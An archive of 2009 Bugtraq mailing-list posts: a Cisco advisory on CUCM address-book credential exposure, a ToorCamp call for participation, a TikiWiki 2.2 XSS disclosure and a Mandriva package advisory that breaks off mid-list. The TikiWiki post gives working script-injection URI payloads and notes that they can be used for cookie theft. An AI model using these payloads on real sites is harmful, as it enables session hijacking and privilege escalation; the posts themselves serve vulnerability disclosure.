List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 15050 invoked from network); 11 Mar 2009 15:09:48 -0000
X-TACSUNS: Virus Scanned
Sender: nobody@cisco.com
From: Cisco Systems Product Security Incident Response Team <psirt@cisco.com>
To: bugtraq@securityfocus.com
Cc: psirt@cisco.com
Subject: Cisco Security Advisory: Cisco Unified Communications Manager IP Phone Personal Address Book Synchronizer Privilege Escalation Vulnerability
Date: Wednesday, 11 March 2009 10:40:00 -0500
Message-id: <200903111040.cucmpab@psirt.cisco.com>
Reply-To: psirt@cisco.com
Errors-To: nobody@cisco.com
MIME-Version: 1.0
Content-Type: Text/Plain; charset="us-ascii"
Content-Transfer-Encoding: 8bit
Prevent-NonDelivery-Report:
Content-Return: Prohibited
Status:
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Cisco Security Advisory: Cisco Unified Communications Manager IP
Phone Personal Address Book Synchronizer Privilege Escalation
Vulnerability
Advisory ID: cisco-sa-20090311-cucmpab
Revision 1.0
For Public Release 2009 March 11 1600 UTC (GMT)
+---------------------------------------------------------------------
Summary
======
Cisco Unified Communications Manager, formerly CallManager, contains
a privilege escalation vulnerability in the IP Phone Personal Address
Book (PAB) Synchronizer feature that may allow an attacker to gain
complete administrative access to a vulnerable Cisco Unified
Communications Manager system. If Cisco Unified Communications
Manager is integrated with an external directory service, it may be
possible for an attacker to leverage the privilege escalation
vulnerability to gain access to additional systems configured to use
the directory service for authentication.
Cisco has released free software updates that address this
vulnerability. Workarounds that mitigate this vulnerability are
available.
This advisory is posted at:
http://www.cisco.com/warp/public/707/cisco-sa-20090311-cucmpab.shtml
Affected Products
================
Vulnerable Products
+------------------
The following products are vulnerable:
* Cisco Unified CallManager 4.1 versions
* Cisco Unified Communications Manager 4.2 versions prior to 4.2(3)SR4b
* Cisco Unified Communications Manager 4.3 versions prior to 4.3(2)SR1b
* Cisco Unified Communications Manager 5.x versions prior to 5.1(3e)
* Cisco Unified Communications Manager 6.x versions prior to 6.1(3)
* Cisco Unified Communications Manager 7.0 versions prior to 7.0(2)
Administrators of systems that are running Cisco Unified
Communications Manager software version 4.x can determine the
software version by navigating to Help > About Cisco Unified
CallManager and selecting the Details button via the Cisco Unified
Communications Manager administration interface.
Administrators of systems that are running Cisco Unified
Communications Manager software versions 5.x, 6.x, and 7.x can
determine the software version by viewing the main page of the Cisco
Unified Communications Manager administration interface. The software
version can also be determined by running the command show version
active via the command line interface (CLI).
Products Confirmed Not Vulnerable
+--------------------------------
Cisco Unified Communications Manager Express is not affected by this
vulnerability. No other Cisco products are currently known to be
affected by this vulnerability.
Details
======
The Cisco IP Phone Personal Address Book (PAB) Synchronizer feature
of Cisco Unified Communications Manager allows users to keep their
Cisco Unified Communications Manager address book synchronized with
their Microsoft Windows address book. The IP Phone PAB Synchronizer
feature contains a privilege escalation vulnerability that may allow
an attacker to obtain complete administrative access to a vulnerable
Cisco Unified Communications Manager system. After an IP Phone PAB
Synchronizer client successfully authenticates to a Cisco Unified
Communications Manager device over a HTTPS connection, the Cisco
Unified Communications Manager returns credentials for a user account
that is used to manage the Cisco Unified Communications Manager
directory service. If an attacker is able to intercept the
credentials, they can perform unauthorized modifications to the Cisco
Unified Communications Manager configuration and extend their
privileges. The IP Phone PAB Synchronizer client has been redesigned
to allow address book synchronization without requiring the directory
service credentials. This vulnerability does not allow an attacker to
gain access to the underlying platform operating system of any Cisco
Unified Communications Manager system.
Cisco Unified Communications Manager 4.x
+---------------------------------------
Cisco Unified Communications Manager software version 4.x by default
stores user information using an internal Lightweight Directory
Access Protocol (LDAP) server called DC Directory. After an IP Phone
PAB Synchronizer client successfully authenticates, the Cisco Unified
Communications Manager returns credentials for the DC Directory user
that will be used by the client to synchronize a user's address book.
Depending on how a Cisco Unified Communications Manager is
configured, an attacker may obtain different privilege levels using
the intercepted credentials.
By default, Cisco Unified Communications Manager software version 4.x
administrator accounts are created as part of an underlying Microsoft
Windows operating system. Cisco Unified Communications Manager is
commonly deployed using the Multi-Level Administration (MLA) feature
to ease the integration of Cisco Unified Communications Manager into
enterprise environments. If MLA is enabled, Cisco Unified
Communications Manager stores administrator accounts in the Cisco
Unified Communications Manager DC Directory service. If an attacker
obtains the DC Directory credentials and MLA is enabled, the attacker
can add an existing account to the Cisco Unified Communications
Manager super-user group. The attacker can then access the Cisco
Unified Communications Manager management interface with complete
administrative access. If MLA is not enabled, the attacker cannot
escalate their privileges; however, they can modify any user settings
in the directory.
The Cisco Unified Communications Manager 4.x IP Phone PAB
Synchronizer client uses an unencrypted LDAP connection to perform
address book synchronization. The DC Directory credentials are passed
in the clear over the network and are vulnerable to being sniffed by
an attacker. If using the DC Directory internal LDAP server, the IP
Phone PAB Synchronizer client communicates to Cisco Unified
Communications Manager on TCP ports 8404 and 8405.
Cisco Unified Communications Manager 5.x, 6.x, 7.x
+-------------------------------------------------
Cisco Unified Communications Manager software versions 5.x, 6.x, and
7.x store user information as a part of the internal Cisco Unified
Communications Manager configuration database. The IP Phone PAB
Synchronizer client uses the AXL application programming interface
(API) to perform address book synchronization. After a client
successfully authenticates, the Cisco Unified Communications Manager
returns credentials for a database user account named TabSyncSysUser
that will be used by the client to synchronize an user's address
book. The TabSyncSysUser account has full read and write privileges
to the Cisco Unified Communications Manager configuration database.
Using the TabSyncSysUser credentials via the AXL API, an attacker can
modify any parameter in the database including creating new
administrator accounts.
Directory Service Integration
+----------------------------
Cisco Unified Communications Manager software versions 4.x, 5.x, 6.x,
and 7.x can be integrated with Microsoft Active Directory and several
non-Microsoft LDAP servers to perform user authentication. In order
to function properly, the integration process requires that
appropriate user credentials for the directory service are provided
to Cisco Unified Communications Manager. If an attacker intercepts or
sniffs the directory service credentials returned by a Cisco Unified
Communications Manager responding to an IP Phone PAB Synchronizer
client, the attacker may be able to leverage the credentials to gain
access to additional systems configured to use the directory service
for authentication.
Administrators should ensure that any directory service credentials
used for the Cisco Unified Communications Manager integration process
are configured to follow the principle of least privilege. The
credentials should be configured with only the privileges necessary
to access the directory service data needed for the integration
process to function properly. The use of overly privileged
administrator accounts is discouraged. Please see the Workarounds
section for more information on performing the integration of Cisco
Unified Communications Manager with AD using the least privilege
concept.
This vulnerability is documented in Cisco Bug IDs CSCso76587 and
CSCso78528 and has been assigned Common Vulnerabilities and Exposures
(CVE) identifier CVE-2009-0632.
Vulnerability Scoring Details
============================
Cisco has provided scores for the vulnerability in this advisory
based on the Common Vulnerability Scoring System (CVSS). The CVSS
scoring in this Security Advisory is done in accordance with CVSS
version 2.0.
CVSS is a standards-based scoring method that conveys vulnerability
severity and helps determine urgency and priority of response.
Cisco has provided a base and temporal score. Customers can then
compute environmental scores to assist in determining the impact of
the vulnerability in individual networks.
Cisco has provided an FAQ to answer additional questions regarding
CVSS at:
http://www.cisco.com/web/about/security/intelligence/cvss-qandas.html
Cisco has also provided a CVSS calculator to help compute the
environmental impact for individual networks at:
http://intellishield.cisco.com/security/alertmanager/cvss
CSCso76587 - Directory Manager password sent in clear from client
CVSS Base Score - 9
Access Vector - Network
Access Complexity - Low
Authentication - Single
Confidentiality Impact - Complete
Integrity Impact - Complete
Availability Impact - Complete
CVSS Temporal Score - 7.4
Exploitability - Functional
Remediation Level - Official-Fix
Report Confidence - Confirmed
CSCso78528 - TabSyncSysUser (axl user) password sent in clear from client
CVSS Base Score - 9
Access Vector - Network
Access Complexity - Low
Authentication - Single
Confidentiality Impact - Complete
Integrity Impact - Complete
Availability Impact - Complete
CVSS Temporal Score - 7.4
Exploitability - Functional
Remediation Level - Official-Fix
Report Confidence - Confirmed
Impact
=====
Successful exploitation of this vulnerability may allow an attacker
to intercept user credentials that allow the attacker to escalate
their privilege level and obtain complete administrative access to a
vulnerable Cisco Unified Communications Manager system. If integrated
with an external directory service, the intercepted user credentials
may allow an attacker to gain access to additional systems configured
to use the directory service for authentication.
Software Versions and Fixes
==========================
When considering software upgrades, also consult
http://www.cisco.com/go/psirt and any subsequent advisories to
determine exposure and a complete upgrade solution.
In all cases, customers should exercise caution to be certain the
devices to be upgraded contain sufficient memory and that current
hardware and software configurations will continue to be supported
properly by the new release. If the information is not clear, contact
the Cisco Technical Assistance Center (TAC) or your contracted
maintenance provider for assistance.
Cisco Unified Communications Manager software version 4.2(3)SR4b
contains the fix for this vulnerability. Administrators of Cisco
Unified CallManager software version 4.1 systems are encouraged to
upgrade to Cisco Unified Communications Manager software version 4.2
(3)SR4b in order to obtain fixed software. Version 4.2(3)SR4b can be
downloaded at the following link:
http://tools.cisco.com/support/downloads/go/PlatformList.x?sftType=Unified%20Communications%20Manager%20Updates&mdfid(0264388&treeName=Voice%20and%20Unified%20Communications&mdfLevel=Software%20Version/Option&url=null&modelName=Cisco%20Unified%20CallManager%20Version%204.2&isPlatform=N&treeMdfId'8875240&modifmdfid=null&imname=null&hybrid=Y&imst=N
Cisco Unified Communications Manager software version 4.3(2)SR1b
contains the fix for this vulnerability. Version 4.3(2)SR1b can be
downloaded at the following link:
http://tools.cisco.com/support/downloads/go/PlatformList.x?sftType=Unified%20Communications%20Manager%20Updates&mdfid(0771554&treeName=Voice%20and%20Unified%20Communications&mdfLevel=Software%20Version/Option&url=null&modelName=Cisco%20Unified%20Communications%20Manager%20Version%204.3&isPlatform=N&treeMdfId'8875240&modifmdfid=null&imname=null&hybrid=Y&imst=N
Cisco Unified Communications Manager software version 5.1(3e)
contains the fix for this vulnerability. Version 5.1(3e) can be
downloaded at the following link:
http://tools.cisco.com/support/downloads/go/ReleaseType.x?optPlat=null&isPlatform=Y&mdfid(0735907&sftType=Unified%20Communications%20Manager%20Updates&treeName=Voice%20and%20Unified%20Communications&modelName=Cisco%20Unified%20Communications%20Manager%20Version%205.1&mdfLevel=Software%20Version/Option&treeMdfId'8875240&modifmdfid=null&imname=null&hybrid=Y&imst=N
Cisco Unified Communications Manager software version 6.1(3) contains
the fix for this vulnerability. Version 6.1(3) can be downloaded at
the following link:
http://tools.cisco.com/support/downloads/go/PlatformList.x?sftType=Unified%20Communications%20Manager%20Updates&mdfid(1023410&treeName=Voice%20and%20Unified%20Communications&mdfLevel=Software%20Version/Option&url=null&modelName=Cisco%20Unified%20Communications%20Manager%20Version%206.1&isPlatform=N&treeMdfId'8875240&modifmdfid=null&imname=null&hybrid=Y&imst=N
Cisco Unified Communications Manager software version 7.0(2) contains
the fix for this vulnerability. Version 7.0(2) can be downloaded at
the following link:
http://tools.cisco.com/support/downloads/go/ReleaseType.x?optPlat=&isPlatform=Y&mdfid(1941895&sftType=Unified+Communications+Manager+Updates&treeName=Voice+and+Unified+Communications&modelName=Cisco+Unified+Communications+Manager+Version+7.0&mdfLevel=Software%20Version/Option&treeMdfId'8875240&modifmdfid=null&imname=&hybrid=Y&imst=N
Workarounds
==========
It is possible to mitigate against this vulnerability using the
following workarounds.
Cisco Unified Communications Manager 4.x
+---------------------------------------
It is possible to mitigate this vulnerability by moving the ASP
script that IP Phone Personal Address Book (PAB) Scynchronizer
clients interact with to a directory location that is not accessible
to the Cisco Unified Communications Manager web server. The system
drive where the ASP script resides depends on how Cisco Unified
Communications Manager was installed. Employing this workaround will
prevent address book synchronization; however, the PAB application
will continue to function. The ASP script can be moved using the
following command:
C:\> move c:\CiscoWebs\User\LDAPDetails.asp c:\temp
It is also possible to mitigate this vulnerability by implementing
filtering on screening devices or using the Windows firewall.
Administrators are advised to permit access to TCP ports 8404 and
8405 only from trusted networks.
Cisco Unified Communications Manager 5.x, 6.x, 7.x
+-------------------------------------------------
It is possible to mitigate this vulnerability by restricting the
permissions of the TabSyncSysUser database user account. In the Cisco
Unified Communications Manager Administration interface, navigate to
User Management > Application User and search for the TabSyncSysUser
account. Remove all groups from the account and change the password.
Employing this workaround will prevent address book synchronization;
however, the PAB application will continue to function.
Active Directory Integration
+---------------------------
To improve the security of Cisco Unified Communications Manager
integration with Active Directory (AD), Cisco has produced a
whitepaper that provides a detailed explanation of how to perform
Cisco Unified Communications Manager integration with AD using the
least-privileged principle. The whitepaper can be downloaded here:
http://www.cisco.com/en/US/products/sw/voicesw/ps556/products_tech_note09186a0080a83435.shtml
Additional mitigation techniques that can be deployed on Cisco
devices within the network are available in the Cisco Applied
Mitigation Bulletin companion document for this advisory:
http://www.cisco.com/warp/public/707/cisco-amb-20090311-cucmpab.shtml
Obtaining Fixed Software
=======================
Cisco has released free software updates that address these
vulnerabilities. Prior to deploying software, customers should
consult their maintenance provider or check the software for feature
set compatibility and known issues specific to their environment.
Customers may only install and expect support for the feature sets
they have purchased. By installing, downloading, accessing or
otherwise using such software upgrades, customers agree to be bound
by the terms of Cisco's software license terms found at
http://www.cisco.com/en/US/products/prod_warranties_item09186a008088e31f.html,
or as otherwise set forth at Cisco.com Downloads at
http://www.cisco.com/public/sw-center sw-usingswc.shtml.
Do not contact psirt@cisco.com or security-alert@cisco.com for
software upgrades.
Customers with Service Contracts
+-------------------------------
Customers with contracts should obtain upgraded software through
their regular update channels. For most customers, this means that
upgrades should be obtained through the Software Center on Cisco's
worldwide website at
http://www.cisco.com.
Customers using Third Party Support Organizations
+------------------------------------------------
Customers whose Cisco products are provided or maintained through
prior or existing agreements with third-party support organizations,
such as Cisco Partners, authorized resellers, or service providers
should contact that support organization for guidance and assistance
with the appropriate course of action in regards to this advisory.
The effectiveness of any workaround or fix is dependent on specific
customer situations, such as product mix, network topology, traffic
behavior, and organizational mission. Due to the variety of affected
products and releases, customers should consult with their service
provider or support organization to ensure any applied workaround or
fix is the most appropriate for use in the intended network before it
is deployed.
Customers without Service Contracts
+----------------------------------
Customers who purchase direct from Cisco but do not hold a Cisco
service contract, and customers who purchase through third-party
vendors but are unsuccessful in obtaining fixed software through
their point of sale should acquire upgrades by contacting the Cisco
Technical Assistance Center (TAC). TAC contacts are as follows.
* +1 800 553 2447 (toll free from within North America)
* +1 408 526 7209 (toll call from anywhere in the world)
* e-mail: tac@cisco.com
Customers should have their product serial number available and be
prepared to give the URL of this notice as evidence of entitlement to
a free upgrade. Free upgrades for non-contract customers must be
requested through the TAC.
Refer to
http://www.cisco.com/en/US/support/tsd_cisco_worldwide_contacts.html
for additional TAC contact
information, including localized telephone numbers, and instructions
and e-mail addresses for use in various languages.
Exploitation and Public Announcements
====================================
The Cisco PSIRT is not aware of any public announcements or malicious
use of the vulnerability described in this advisory.
The vulnerability in Cisco Unified Communications Manager 4.x
software versions was reported to Cisco by Olivier Grosjeanne of
Dimension Data France. The vulnerability in Cisco Unified
Communications Manager 5.x, 6.x and 7.x software versions was
reported by Oliver Dewdney of LBI.
Status of this Notice: FINAL
===========================
THIS DOCUMENT IS PROVIDED ON AN "AS IS" BASIS AND DOES NOT IMPLY ANY
KIND OF GUARANTEE OR WARRANTY, INCLUDING THE WARRANTIES OF
MERCHANTABILITY OR FITNESS FOR A PARTICULAR USE. YOUR USE OF THE
INFORMATION ON THE DOCUMENT OR MATERIALS LINKED FROM THE DOCUMENT IS
AT YOUR OWN RISK. CISCO RESERVES THE RIGHT TO CHANGE OR UPDATE THIS
DOCUMENT AT ANY TIME.
A stand-alone copy or Paraphrase of the text of this document that
omits the distribution URL in the following section is an
uncontrolled copy, and may lack important information or contain
factual errors.
Distribution
===========
This advisory is posted on Cisco's worldwide website at:
http://www.cisco.com/warp/public/707/cisco-sa-20090311-cucmpab.shtml
In addition to worldwide web posting, a text version of this notice
is clear-signed with the Cisco PSIRT PGP key and is posted to the
following e-mail and Usenet news recipients.
* cust-security-announce@cisco.com
* first-bulletins@lists.first.org
* bugtraq@securityfocus.com
* vulnwatch@vulnwatch.org
* cisco@spot.colorado.edu
* cisco-nsp@puck.nether.net
* full-disclosure@lists.grok.org.uk
* comp.dcom.sys.cisco@newsgate.cisco.com
Future updates of this advisory, if any, will be placed on Cisco's
worldwide website, but may or may not be actively announced on
mailing lists or newsgroups. Users concerned about this problem are
encouraged to check the above URL for any updates.
Revision History
===============
+---------------------------------------+
| Revision | | Initial |
| 1.0 | 2009-March-11 | public |
| | | release. |
+---------------------------------------+
Cisco Security Procedures
========================
Complete information on reporting security vulnerabilities in Cisco
products, obtaining assistance with security incidents, and
registering to receive security information from Cisco, is available
on Cisco's worldwide website at:
http://www.cisco.com/en/US/products/products_security_vulnerability_policy.html
This includes instructions for press inquiries regarding Cisco security notices.
All Cisco security advisories are available at:
http://www.cisco.com/go/psirt
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.5 (SunOS)
iD8DBQFJt9DF86n/Gc8U/uARAtjqAJ9eE9ETbc4lyUJV8GrCEmiaJeS1NACdExbB
dLmiSiaPCdGHpVKTKvZj78k�h7
-----END PGP SIGNATURE-----
From - Thu Mar 12 11:21:13 2009
X-Account-Key: account7
X-UIDL: 4909bb8c00006911
X-Mozilla-Status: 0000
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-39718-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing3.securityfocus.com (outgoing.securityfocus.com [205.206.231.27])
by mx.securityspace.com (Postfix) with ESMTP id 11102ED787
for <lists@securityspace.com>; Thu, 12 Mar 2009 11:17:21 -0400 (EDT)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing3.securityfocus.com (Postfix) with QMQP
id 1673E236FAE; Thu, 12 Mar 2009 08:11:00 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 11498 invoked from network); 11 Mar 2009 18:54:35 -0000
Date: Wed, 11 Mar 2009 12:54:34 -0600
Message-Id: <200903111854.n2BIsYrt025782@www3.securityfocus.com>
Content-Type: text/plain
Content-Disposition: inline
Content-Transfer-Encoding: binary
MIME-Version: 1.0
X-Mailer: MIME-tools 5.420 (Entity 5.420)
From: h1kari@toorcon.org
To: bugtraq@securityfocus.com
Subject: TOORCAMP 2009 CALL FOR PARTICIPATION
Status:
TOORCAMP 2009 CALL FOR PARTICIPATION
INTRODUCTION
ToorCamp is the United State's first ever full-scale hacker camp. Modelled after the camps in Holland and Germany, ToorCamp will focus on all of the technology topics that ToorCon has become famous for but will expand out into other areas of society. ToorCamp will offer 2 days of talks on many different topics -- Security, Internet, Emerging Technologies, Hardware Hacking, and Privacy are just some of the areas we will be covering. ToorCamp will also feature 2 days of hands-on workshops on a multitude of different skills that you may have never found yourself interested in learning about before. Blacksmithing, Lock Picking, Orienteering, Logic Design, Archery -- These are just a few of the topics you can expect.
ToorCamp is run by the same group that runs ToorCon and will also be heavily supported by many other hacker conferences in the US. ToorCamp will be organized as a bunch of different campsites which will be fully run by autonomous groups. We will provide the power and internet -- you provide the rest. We're heavily encouraging groups to build structures, setup art projects, throw parties, and generally do things that will show to the world that US hackers can throw a kickass hacker camp too!
Oh, and did we mention it'll be at a Titan-1 Missile Silo? We've managed to find one of the best locations in the northwest to throw this event. We've partnered with a group of people who are currently retrofitting the Silo into an ultra-secure datacenter so internet connectivity won't be a problem. ToorCamp will be situated in central Washington roughly 3 hours driving distance from Seattle and within 15 minutes drive of a private international airport. Don't miss this once in a lifetime opportunity to make history with us and help launch the first public US hacker camp!
LOGISTICS
ToorCamp will provide many of the basic hacker camp comforts such as:
- Power
- Internet
And some of the less-essential comforts such as:
- Food
- Water
- Toilets
Some optional accessories that will be available for rental are:
- Tents
- Camping matresses
- Sleeping bags
CAMPSITE ORGANIZER SUBMISSION INFORMATION
We're looking for campsite organizers that can help out by taking charge of parts of the camp. Campsites that have at least 10 occupants will be given a 10% discount on admission for everyone registered for the campsite. Part of being a campsite organizer is helping fellow campers get shelter, community food, throwing parties, and possibly organizing group transportation out to the camp. The 10% discount refund can be given back to the campsite organizer to help fund these types of things, can be refunded to all of the campsite inhabitants, or donated to the ToorCon Foundation. To sign up for being a campsite organizer, please fill out our signup webform at:
[
http://toorcamp.org/campsite-signup]
PAPER SUBMISSION INFORMATION
For ToorCamp we will be having 50-minute talks on Thursday, 20-minute talks on Friday, and then hands-on workshops throughout the weekend. To submit a talk for the conference, please fill out the information below and email to cfp@toorcamp.org:
0. Name
1. Email Address
2. Mobile Phone Number
3. Brief Bio
4. Title of the Talk
5. Brief Abstract
6. Any supporting materials, links, outlines, etc
7. What talk format are you submitting for:
� � 0. 20-minute talk
� � 1. 50-minute talk
� � 2. 1-day workshop
� � 3. 2-day workshop
DISCLAIMERS
ToorCamp has full permission to record and republish any material that is presented at the conference.
REASONS TO SUBMIT A TALK
- The fame and prestige of presenting at the first public US hacker camp!
- Invitations to all of the parties and special events
- Sorry, we are not able to cover air travel expenses but we will try to provide campsite accommodations if requested
SPONSORSHIP
ToorCamp has many levels of sponsorship for companies that want to help make history. We're currently looking for sponsors for the conference and the Missile Silo owners are also looking for sponsors and potential partners to help them build out their ultra-secure datacenter. For more information on sponsorship opportunities, please email geo@toorcon.org.
REGISTRATION
Pre-registration is currently open at $150. It will be slowly increasing the price every month until it's $350 at the gate, so don't miss out on this amazing price for 4 full days of camping, talks, workshops, and non-stop entertainment at one of the best locations in the northwest. Once you're registered you'll have access to our planning, talks, and rideshare discussion forums. To pre-register we've setup registration on our website linked below.
[
http://toorcamp.org/Registration]
LOCATION INFO
ToorCamp 2009
Titan-1 Missile Silo
July 2nd-5th, 2009
Moses Lake, WA
[
http://www.toorcamp.org]
IMPORTANT DATES
March 10th, 2009 - Call for Participation Opens
April 3rd, 2009 - First Round of Registration Closes
May 1st, 2009 - Second Round of Registration Closes
May 1st, 2009 - First round of selection announced
May 15nd, 2009 - Second round of selection announced
May 29th, 2009 - Call for Papers closes
June 5th, 2009 - Third Round of Registration Closes
June 5th, 2009 - Speaker & sponsor selection finalized
July 1st, 2009 - Move into ToorCamp
July 2nd, 2009 - ToorCamp 50-minute Talks
July 3rd, 2009 - ToorCamp 20-minute Talks
July 4th, 2009 - ToorCamp Workshops
July 5th, 2009 - ToorCamp Workshops
July 6th, 2009 - Move out of ToorCamp
From - Thu Mar 12 11:31:13 2009
X-Account-Key: account7
X-UIDL: 4909bb8c00006913
X-Mozilla-Status: 0000
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-39726-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing2.securityfocus.com (outgoing.securityfocus.com [205.206.231.26])
by mx.securityspace.com (Postfix) with ESMTP id 15C63ED5EC
for <lists@securityspace.com>; Thu, 12 Mar 2009 11:26:29 -0400 (EDT)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing2.securityfocus.com (Postfix) with QMQP
id 9F095143BD7; Thu, 12 Mar 2009 08:15:30 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 14983 invoked from network); 12 Mar 2009 08:54:42 -0000
Date: Thu, 12 Mar 2009 02:54:41 -0600
Message-Id: <200903120854.n2C8sfs8027843@www3.securityfocus.com>
Content-Type: text/plain
Content-Disposition: inline
Content-Transfer-Encoding: binary
MIME-Version: 1.0
X-Mailer: MIME-tools 5.420 (Entity 5.420)
From: iliz-z@yandex.rui
To: bugtraq@securityfocus.com
Subject: TikiWiki 2.2 XSS Vulnerability in URI
Status:
Application: TikiWiki
Version: 2.2 (latest)
Website: www.tikiwiki.org
Bug: Active XSS in URI
Exploitation: Remote
Date: 12 Mar 2009
Discovered by: iliz
Author: iliz
Contact: e-mail: iliz-z(at)yandex(dot)ru
Bug Description:
TikiWiki version 2.2 and later uses URI in html response body and fails to sanitize it. Is therefore prune to Active XSS attack.
PROOF OF CONCEPT:
/tiki-galleries.php/>"><Script>alert(1)</scRipt>
/tiki-list_file_gallery.php/>"><Script>alert(2)</scRipt>
/tiki-listpages.php/>"><Script>alert(3)</scRipt>
/tiki-orphan_pages.php/>"><Script>alert(4)</scRipt>
The javascript code will be executed in the context of the victim's
browser, this can be exploited to steal cookies and escalate
privileges to administrator.
Tested with TikiWiki 2.2, Apache 2.2, Mozilla Firefox 3.0.6, InternetExplorer 7, Opera 9.65
From - Thu Mar 12 11:41:14 2009
X-Account-Key: account7
X-UIDL: 4909bb8c00006914
X-Mozilla-Status: 0000
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-39719-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing3.securityfocus.com (outgoing.securityfocus.com [205.206.231.27])
by mx.securityspace.com (Postfix) with ESMTP id 8DAC1ED787
for <lists@securityspace.com>; Thu, 12 Mar 2009 11:33:52 -0400 (EDT)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing3.securityfocus.com (Postfix) with QMQP
id D9EBE236FCE; Thu, 12 Mar 2009 08:11:41 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 13483 invoked from network); 11 Mar 2009 19:29:04 -0000
To: bugtraq@securityfocus.com
Subject: [ MDVSA-2009:072 ] perl-MDK-Common
Date: Wed, 11 Mar 2009 20:29:00 +0100
From: security@mandriva.com
Reply-To: <xsecurity@mandriva.com>
Message-Id: <E1LhU6u-0002dS-Sa@titan.mandriva.com>
Status:
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
_______________________________________________________________________
Mandriva Linux Security Advisory MDVSA-2009:072
http://www.mandriva.com/security/
_______________________________________________________________________
Package : perl-MDK-Common
Date : March 10, 2009
Affected: 2008.0, 2008.1, 2009.0, Corporate 3.0, Corporate 4.0,
Multi Network Firewall 2.0
_______________________________________________________________________
Problem Description:
Some vulnerabilities were discovered and corrected in perl-MDK-Common:
The functions used to write strings into shell like configuration files
by Mandriva tools were not taking care of some special characters. This
could lead to some bugs (like wireless keys containing certain
characters not working), and privilege escalation. This update fixes
that issue by ensuring proper protection of strings.
The updated packages have been patched to correct these issues.
_______________________________________________________________________
Updated Packages:
Mandriva Linux 2008.0:
255c507faad86d74633fea56446b9f89 2008.0/i586/perl-MDK-Common-1.2.9-1.1mdv2008.0.noarch.rpm
4f83f9416037cd3775b255511ed99aaf 2008.0/SRPMS/perl-MDK-Common-1.2.9-1.1mdv2008.0.src.rpm
Mandriva Linux 2008.0/X86_64:
6ac913c2551578cbb10713db5141ab72 2008.0/x86_64/perl-MDK-Common-1.2.9-1.1mdv2008.0.noarch.rpm
4f83f9416037cd3775b255511ed99aaf 2008.0/SRPMS/perl-MDK-Common-1.2.9-1.1mdv2008.0.src.rpm
Mandriva Linux 2008.1:
8f3509691549b62e7da2682984f4c888 2008.1/i586/perl-MDK-Common-1.2.12-1.1mdv2008.1.noarch.rpm
f1919920b9fcca35dcd0033f0a19e236 2008.1/SRPMS/perl-MDK-Common-1.2.12-1.1mdv2008.1.src.rpm
Mandriva Linux 2008.1/X86_64:
4c25f8f946005b77d7581639ca544ae8 2008.1/x86_64/perl-MDK-Common-1.2.12-1.1mdv2008.1.noarch.rpm
f1919920b9fcca35dcd0033f0a19e236 2008.1/SRPMS/perl-MDK-Common-1.2.12-1.1mdv2008.1.src.rpm
Mandriva Linux 2009.0:
31fda6d87bf3ef9dfb9d9e4919c62f75 2009.0/i586/perl-MDK-Common-1.2.14-1.1mdv2009.0.noarch.rpm
073a35460e25c90234c75a66d1779609 2009.0/SRPMS/perl-MDK-Common-1.2.14-1.1mdv2009.0.src.rpm
Mandriva Linux 2009.0/X86_64:
93b0176cd4b5856e2a02f4af15a7f002 2009.0/x86_64/perl-MDK-Common-1.2.14-1.1mdv2009.0.noarch.rpm
073a35460e25c90234c75a66d1779609 2009.0/SRPMS/perl-MDK-Common-1.2.14-1.1mdv2009.0.src.rpm
Corporate 3.0:
df26c59475110bd53b5f288f11a53d57 corporate/3.0/i586/perl-MDK-Common-1.1.11-3.1.C30mdk.i586.rpm
0d7c3fa75f2e835ab1237fda5cc10387 corporate/3.0/i586/perl-MDK-Common-devel-1.1.11-3.1.C30mdk.i586.rpm
dc24b24dbf8a233cbd10f92ab8a3f5a4 corporate/3.0/SRPMS/perl-MDK-Common-1.1.11-3.1.C30mdk.src.rpm
Corporate 3.0/X86_64:
c6c00d568f5e7f48bcf8769a75dfaef2 corporate/3.0/x86_64/perl-MDK-Common-1.1.11-3.1.C30mdk.x86_64.rpm
f16597e275371d2f40d8ec9723b6f770 corporate/3.0/x86_64/perl-MDK-Common-devel-1.1.11-3.1.C30mdk.x86_64.rpm
